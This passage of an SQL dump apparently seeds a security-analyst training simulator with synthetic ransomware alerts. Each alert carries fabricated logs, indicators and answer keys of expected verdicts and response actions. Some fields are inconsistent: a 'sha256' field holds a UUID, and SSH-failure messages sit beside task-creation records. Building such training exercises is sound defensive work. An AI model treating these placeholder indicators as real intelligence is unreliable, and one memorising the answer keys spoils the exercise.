AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(972, 'Unauthorized Scheduled Task Created', 'high', 'System Logs', 'A new scheduled task was created to execute a ransomware payload upon system start-up. This is indicative of an advanced persistence technique to maintain access after system reboots.', 'Persistence', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"4698\",\"event_source\":\"Microsoft-Windows-TaskScheduler\",\"task_name\":\"\\\\Windows\\\\System32\\\\Tasks\\\\RansomwareTask\",\"task_action\":\"Create\",\"task_user\":\"SYSTEM\",\"trigger_type\":\"AtStartup\",\"action_type\":\"Execute\",\"action_command\":\"C:\\\\Windows\\\\System32\\\\ransomware.exe\",\"action_arguments\":\"/silent\",\"launcher_ip\":\"192.168.1.55\",\"attacker_ip\":\"203.0.113.45\",\"binary_sha256\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"username\":\"compromised_user\"}', '2026-01-17 03:39:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal host likely compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity_logs\",\"verdict\":\"suspicious\",\"details\":\"User account used to create unauthorized task.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.660Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(973, 'Lateral Movement Detected Across Network - Step 4', 'high', 'Network Traffic Analysis', 'An attacker is using stolen credentials to move laterally across the network, aiming to spread ransomware by encrypting files on additional systems.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"10.20.30.40\",\"destination_ip\":\"192.168.1.15\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"action\":\"login\",\"status\":\"success\",\"file_accessed\":\"C:\\\\Users\\\\Public\\\\Documents\\\\confidential.txt\",\"malware_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"protocol\":\"SMB\",\"event_id\":4624,\"logon_type\":3,\"description\":\"Successful network logon using SMB protocol with stolen credentials.\"}', '2026-01-17 03:39:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP targeted by lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Credentials potentially compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(974, 'Data Exfiltration Alert Triggered', 'critical', 'Data Loss Prevention (DLP) System', 'The DLP system detected an attempt to exfiltrate sensitive data from an internal host to an external server, which could precede data encryption by the attacker.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:25:30Z\",\"event_id\":\"EXFIL-20231005-1245\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.50\",\"filename\":\"confidential_data.zip\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"j.doe\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"message\":\"Attempted data exfiltration detected and blocked by DLP system.\"}', '2026-01-17 03:39:18', '2026-02-16 17:52:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous data breaches.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data potentially targeted for exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to known data exfiltration malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Employee username involved in the data exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(975, 'Ransom Note Discovered', 'critical', 'Affected System Files', 'A ransom note was discovered on the affected system, indicating a demand for payment to receive decryption keys. The note challenges the company to decide whether to pay the ransom or restore data from backups. The presence of this note indicates that encryption has likely occurred, and immediate actions are necessary to prevent further damage.', 'Impact', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:22:56Z\",\"event_type\":\"file_created\",\"hostname\":\"compromised-device.local\",\"username\":\"jdoe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\RANSOM_NOTE.txt\",\"file_hash\":\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\",\"attacker_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"note_content\":\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\",\"associated_malicious_file\":\"encryptor.exe\",\"malicious_file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-01-17 03:39:18', '2026-02-16 17:52:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\RANSOM_NOTE.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Ransom note file indicating encryption of files.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransom notes.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address linked to ransomware operations.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash related to the encryption malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(976, 'Initial Network Breach Detected', 'critical', 'Firewall logs', 'A breach was detected through a compromised software update, indicative of a supply chain attack. This aligns with Sandworm\'s known tactics of targeting critical infrastructures using destructive methods. The initial access was likely aimed at causing widespread disruption in Maersk\'s network.', 'Destructive Attack', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event\":\"network_connection\",\"source_ip\":\"5.188.86.123\",\"destination_ip\":\"192.168.1.10\",\"firewall_action\":\"allow\",\"protocol\":\"TCP\",\"destination_port\":443,\"file_name\":\"update_software_v1.4.exe\",\"file_hash\":\"b6f6f1c4abc1234f7d1e9b0c8e5d9a1a\",\"user\":\"system_update\",\"event_id\":\"FW123456789\"}', '2026-01-17 03:39:49', '2026-02-16 17:51:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"5.188.86.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Sandworm APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Maersk\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"update_software_v1.4.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"File associated with the initial breach through a compromised update.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b6f6f1c4abc1234f7d1e9b0c8e5d9a1a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
